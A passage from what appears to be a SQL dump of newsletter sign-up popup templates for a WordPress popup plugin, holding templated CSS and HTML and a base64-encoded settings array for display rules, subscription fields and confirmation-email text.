background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}\', endColorstr=\'[bg_color_1]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 10% 15% 0;\r\n	text-align:center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: 1px solid #d1b36d;\r\n  	color: #888;\r\n	text-shadow: 1px 1px 5px #888;\r\n  	padding: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	box-shadow: 2px 2px 2px #dcdcdc inset;\r\n  	font-size: 17px;\r\n	width:100%;\r\n  	background-color: #fff;\r\n  	padding-left: 10px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	font-size: 17px;\r\n  	color: #888;\r\n	text-shadow: 1px 1px 5px #888;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[name=\"email\"] {\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/mail-icon.png\");\r\n  	background-repeat: no-repeat;\r\n  	background-position: 90% center;\r\n	width:100%;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border-color: #000;\r\n	width: 60%;\r\n  	[if bg_type_2 == \'color\']\r\n  	background: [bg_color_2];\r\n   box-shadow: -4px -4px 0px rgba(0, 0, 0, 0.1) inset;\r\n  	[elseif bg_type_2 == \'img\']\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n  	color: #fff;\r\n    font-size: 20px;\r\n    text-shadow: 1px 1px 1px #000;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n   box-shadow: 4px 4px 0px rgba(0, 0, 0, 0.1) inset;\r\n	\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n	float: left;\r\n  	width: 80%;\r\n	margin-left: 10%;\r\n  	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_1 {\r\n	float: right;\r\n    [if enb_txt_0]\r\n    width: 50%;\r\n    [else]\r\n    width: 100%;\r\n    [endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n  	top:15px;\r\n  	right:10px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #585858;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSm{\r\nmargin-top:20px;\r\n}','layered-popup.jpg',1,1,1,1,0,0,0,'2015-01-10 17:59:43',1,0),(9,'SIGN UP',1,0,'YTozOntzOjQ6Im1haW4iO2E6Mjk6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoyNjoiY2xvc2Vfb25fYWZ0ZXJfYWN0aW9uX3RpbWUiO3M6MToiMSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6MTQ6InNob3dfZGF0ZV9mcm9tIjtzOjA6IiI7czoxMjoic2hvd19kYXRlX3RvIjtzOjA6IiI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjE1OiJjb3VudF90aW1lc19udW0iO3M6MToiMSI7czoxNToiY291bnRfdGltZXNfbWVzIjtzOjM6ImRheSI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjt9czozOiJ0cGwiO2E6ODg6e3M6NToid2lkdGgiO3M6MzoiNDAwIjtzOjEzOiJ3aWR0aF9tZWFzdXJlIjtzOjI6InB4IjtzOjE4OiJiZ19vdmVybGF5X29wYWNpdHkiO3M6MzoiMC41IjtzOjk6ImJnX3R5cGVfMCI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMCI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiIzhjNzc2NCI7czo5OiJiZ190eXBlXzEiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzEiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8xIjtzOjc6IiM3NTM2MmMiO3M6MTA6ImZvbnRfbGFiZWwiO3M6NzoiZGVmYXVsdCI7czoxNjoibGFiZWxfZm9udF9jb2xvciI7czo3OiIjZmZmZmZmIjtzOjEwOiJmb250X3R4dF8wIjtzOjc6ImRlZmF1bHQiO3M6MTc6InRleHRfZm9udF9jb2xvcl8wIjtzOjc6IiNmOWU2Y2UiO3M6MTE6ImZvbnRfZm9vdGVyIjtzOjc6ImRlZmF1bHQiO3M6MTc6ImZvb3Rlcl9mb250X2NvbG9yIjtzOjc6IiM1ODU4NTgiO3M6MTU6InJlc3BvbnNpdmVfbW9kZSI7czozOiJkZWYiO3M6MTc6InJlaWRyZWN0X29uX2Nsb3NlIjtzOjA6IiI7czo5OiJjbG9zZV9idG4iO3M6MTE6IndoaWxlX2Nsb3NlIjtzOjc6ImJ1bGxldHMiO3M6MTE6Imxpc3RzX2dyZWVuIjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6OToiZW5iX2xhYmVsIjtzOjE6IjEiO3M6NToibGFiZWwiO3M6MzA6IlNJR04gVVA8YnI+IHRvIG91ciBOZXdzbGV0dGVyISI7czo5OiJlbmJfdHh0XzAiO3M6MToiMSI7czo5OiJmb290X25vdGUiO3M6MTE4OiJXZSByZXNwZWN0IHlvdXIgcHJpdmFjeS4gWW91ciBpbmZvcm1hdGlvbiB3aWxsIG5vdCBiZSBzaGFyZWQgd2l0aCBhbnkgdGhpcmQgcGFydHkgYW5kIHlvdSBjYW4gdW5zdWJzY3JpYmUgYXQgYW55IHRpbWUgIjtzOjE1OiJlbmJfc21fZmFjZWJvb2siO3M6MToiMSI7czoxNzoiZW5iX3NtX2dvb2dsZXBsdXMiO3M6MToiMSI7czoxNDoiZW5iX3NtX3R3aXR0ZXIiO3M6MToiMSI7czo5OiJzbV9kZXNpZ24iO3M6NDoiYm94eSI7czo4OiJhbmltX2tleSI7czo0OiJub25lIjtzOjEzOiJhbmltX2R1cmF0aW9uIjtzOjA6IiI7czoxMzoiZW5iX3N1YnNjcmliZSI7czoxOiIxIjtzOjg6InN1Yl9kZXN0IjtzOjk6IndvcmRwcmVzcyI7czoyMzoic3ViX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTk6InN1Yl9hd2ViZXJfbGlzdG5hbWUiO3M6MDoiIjtzOjIxOiJzdWJfYXdlYmVyX2FkdHJhY2tpbmciO3M6MDoiIjtzOjIxOiJzdWJfbWFpbGNoaW1wX2FwaV9rZXkiO3M6MDoiIjtzOjI1OiJzdWJfbWFpbGNoaW1wX2dyb3Vwc19mdWxsIjtzOjA6IiI7czoxNDoic3ViX2dyX2FwaV9rZXkiO3M6MDoiIjtzOjE2OiJzdWJfZ3JfY3ljbGVfZGF5IjtzOjE6IjAiO3M6MTM6InN1Yl9pY19hcHBfaWQiO3M6MDoiIjtzOjE1OiJzdWJfaWNfYXBwX3VzZXIiO3M6MDoiIjtzOjE1OiJzdWJfaWNfYXBwX3Bhc3MiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX3VybCI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfa2V5IjtzOjA6IiI7czoxODoic3ViX2FyX2Zvcm1fYWN0aW9uIjtzOjA6IiI7czoxMDoic3ViX3NnYV9pZCI7czowOiIiO3M6MTU6InN1Yl9zZ2FfbGlzdF9pZCI7czowOiIiO3M6MjE6InN1Yl9zZ2FfYWN0aXZhdGVfY29kZSI7czowOiIiO3M6MTM6InN1Yl9zZl9hcHBfaWQiO3M6MDoiIjtzOjE0OiJzdWJfY2tfYXBpX2tleSI7czowOiIiO3M6MTQ6InN1Yl9tZW1fYWNjX2lkIjtzOjA6IiI7czoxNToic3ViX21lbV9wdWRfa2V5IjtzOjA6IiI7czoxNjoic3ViX21lbV9wcml2X2tleSI7czowOiIiO3M6MTA6InN1Yl9maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InN1Yl90eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJzdWJfdHh0X3N1Y2Nlc3MiO3M6MjQ6IlRoYW5rIHlvdSBmb3Igc3Vic2NyaWJlISI7czoyMToic3ViX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjIwOiJzdWJfdHh0X2V4aXN0c19lbWFpbCI7czoyMjoiRW1wdHkgb3IgaW52YWxpZCBlbWFpbCI7czoxNjoic3ViX3JlZGlyZWN0X3VybCI7czowOiIiO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX3N1YmplY3QiO3M6MzQ6IkNvbmZpcm0gc3Vic2NyaXB0aW9uIG9uIFtzaXRlbmFtZV0iO3M6MjU6InN1Yl90eHRfY29uZmlybV9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9tZXNzYWdlIjtzOjE5NzoiWW91IHN1YnNjcmliZWQgb24gc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4uIEZvbGxvdyA8YSBocmVmPVwiW2NvbmZpcm1fbGlua11cIj50aGlzIGxpbms8L2E+IHRvIGNvbXBsZXRlIHlvdXIgc3Vic2NyaXB0aW9uLiBJZiB5b3UgZGlkIG5vdCBzdWJzY3JpYmUgaGVyZSAtIGp1c3QgaWdub3JlIHRoaXMgbWVzc2FnZS4iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6Mzc6IltzaXRlbmFtZV0gWW91ciB1c2VybmFtZSBhbmQgcGFzc3dvcmQiO3M6Mjg6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjY1OiJVc2VybmFtZTogW3VzZXJfbG9naW5dPGJyIC8+UGFzc3dvcmQ6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoyNToic3ViX3JlZGlyZWN0X2VtYWlsX2V4aXN0cyI7czowOiIiO3M6MTM6InN1Yl9idG5fbGFiZWwiO3M6NzoiU0lHTiBVUCI7czoxMzoic3ViX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InN1Yl9uZXdfbWVzc2FnZSI7czoxMjk6IllvdSBoYXZlIG5ldyBzdWJzY3JpYmVyIG9uIHlvdXIgc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4sIGhlcmUgdXMgc3Vic2NyaWJlciBpbmZvcm1hdGlvbjo8YnIgLz5bc3Vic2NyaWJlcl9kYXRhXSI7czo4OiJsb2dpbl9ieSI7czo4OiJ1c2VybmFtZSI7czoxODoibG9naW5fcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoxNToibG9naW5fYnRuX2xhYmVsIjtzOjU6IkxvZ2luIjtzOjIzOiJyZWdfd3BfY3JlYXRlX3VzZXJfcm9sZSI7czoxMDoic3Vic2NyaWJlciI7czoxMzoicmVnX2J0bl9sYWJlbCI7czo4OiJSZWdpc3RlciI7czoxMDoicmVnX2ZpZWxkcyI7YToyOntzOjQ6Im5hbWUiO2E6Nzp7czozOiJlbmIiO3M6MToiMSI7czo0OiJuYW1lIjtzOjQ6Im5hbWUiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjQ6Ik5hbWUiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjt9czo1OiJlbWFpbCI7YTo3OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjY6IkUtTWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MzoiZW5iIjtzOjE6IjEiO319czoyMDoicmVnX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InJlZ190eHRfc3VjY2VzcyI7czoyNzoiVGhhbmsgeW91IGZvciByZWdpc3RyYXRpb24hIjtzOjIxOiJyZWdfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MTY6InJlZ19yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjI4OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjM0OiJDb25maXJtIHJlZ2lzdHJhdGlvbiBvbiBbc2l0ZW5hbWVdIjtzOjI1OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoicmVnX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czoxOTY6IllvdSByZWdpc3RlcmVkIG9uIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiBGb2xsb3cgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiB0byBjb21wbGV0ZSB5b3VyIHJlZ2lzdHJhdGlvbi4gSWYgeW91IGRpZCBub3QgcmVnaXN0ZXIgaGVyZSAtIGp1c3QgaWdub3JlIHRoaXMgbWVzc2FnZS4iO3M6MzE6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6Mzc6IltzaXRlbmFtZV0gWW91ciB1c2VybmFtZSBhbmQgcGFzc3dvcmQiO3M6Mjg6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjY1OiJVc2VybmFtZTogW3VzZXJfbG9naW5dPGJyIC8+UGFzc3dvcmQ6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoxMzoicmVnX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InJlZ19uZXdfbWVzc2FnZSI7czoxMjE6IllvdSBoYXZlIG5ldyBtZW1iZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSB1cyBtZW1iZXIgaW5mb3JtYXRpb246PGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO3M6NToidHh0XzAiO3M6MTcyOiI8cD5Qb3B1cCBieSBTdXBzeXN0aWMgbGV0cyB5b3UgZWFzaWx5IGNyZWF0ZSBlbGVnYW50IG92ZXJsYXBwaW5nIHdpbmRvd3Mgd2l0aCB1bmxpbWl0ZWQgZmVhdHVyZXMuIFBvcC11cHMgd2l0aCBTbGlkZXIsIExpZ2h0Ym94LCBDb250YWN0IGFuZCBTdWJzY3JpcHRpb24gZm9ybXMgYW5kIG1vcmU8L3A+Ijt9czoxMDoib3B0c19hdHRycyI7YToyOntzOjk6ImJnX251bWJlciI7czoxOiIyIjtzOjE2OiJ0eHRfYmxvY2tfbnVtYmVyIjtzOjE6IjEiO319','<link rel=\"stylesheet\" type=\"text/css\" href=\"//fonts.googleapis.com/css?family=Amatic+SC\" />\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			[if enb_label]\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_txt_0]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n				[txt_0]\r\n				</div>\r\n			[endif]\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			<div class=\"ppsRightCol\">\r\n				[if enb_sm]\r\n					<div style=\"clear: both;\"></div>\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: \'arial\', arial;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #f9e6ce;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	display: table;\r\n  	width: 100%;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 100%;\r\n  	box-shadow: rgba(192,192,192,1) 0 4px 20px, 6px -6px 0px rgba(0, 0, 0, 0.1) inset;\r\n  	border-radius: 4px;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n  	display: table-cell;\r\n	[if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  	\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #FFF;\r\n	font-family: \'Amatic SC\', arial;\r\n	font-size: 45px;\r\n	letter-spacing: -1px;\r\n	line-height: 40px;\r\n	letter-spacing: -1px;\r\n	font-weight: bold;\r\n	margin-top: 15px;\r\n	margin-bottom: 16px;\r\n	padding-left: 20px;\r\n	-moz-text-shadow: 0px 0px 1px #000;\r\n	-webkit-text-shadow: 0px 0px 1px #000;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 10% 10% 5% 5%;\r\n	text-align:right;\r\n	margin-bottom: 20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	/*width: 100%;*/\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: 0px solid #d1b36d;\r\n	border-radius: 4px !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	box-shadow: 2px 2px 2px #dcdcdc inset;\r\n  	padding-left: 20px;\r\n  	font-size: 17px;\r\n	width:100%;\r\n  	background-color: #fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n  	color: #000;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	margin-left: -4px;\r\n  	font-size: 17px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[name=\"email\"] {\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/email-icon.png\");\r\n  	background-repeat: no-repeat;\r\n	width:100%;\r\n	background-attachment: scroll;\r\n	background-position: 0px center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border-color: #000;\r\n	width: 60%;\r\n  	[if bg_type_1 == \'color\']\r\n  	background: [bg_color_1] 100%;\r\n   	box-shadow: -4px -4px 0px rgba(0, 0, 0, 0.1) inset;\r\n  	background-image: none;\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n  	color: #fff;\r\n    font-size: 20px;\r\n    text-shadow: 1px 1px 1px #000;\r\n  	cursor: pointer;\r\n  	padding: 0 6px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n   box-shadow: 4px 4px 0px rgba(0, 0, 0, 0.1) inset;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n	float: left;\r\n  	width: 80%;\r\n	margin-left: 10%;\r\n	text-align: justify;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n	top: 15px;\r\n  	top:15px;\r\n  	right:10px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #585858;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSm{\r\n	margin-top:20px;\r\n}\r\n#ppsPopupShell_[ID] input[name=\"name\"] {\r\n    background-image: url(\"[PPS_ASSETS_URL]img/assets/user-icon.png\");\r\n    background-repeat: no-repeat;\r\n    background-attachment: scroll;\r\n    background-position: 0px center;\r\n}','sing-up.jpg',1,1,1,1,0,0,0,'2015-01-10 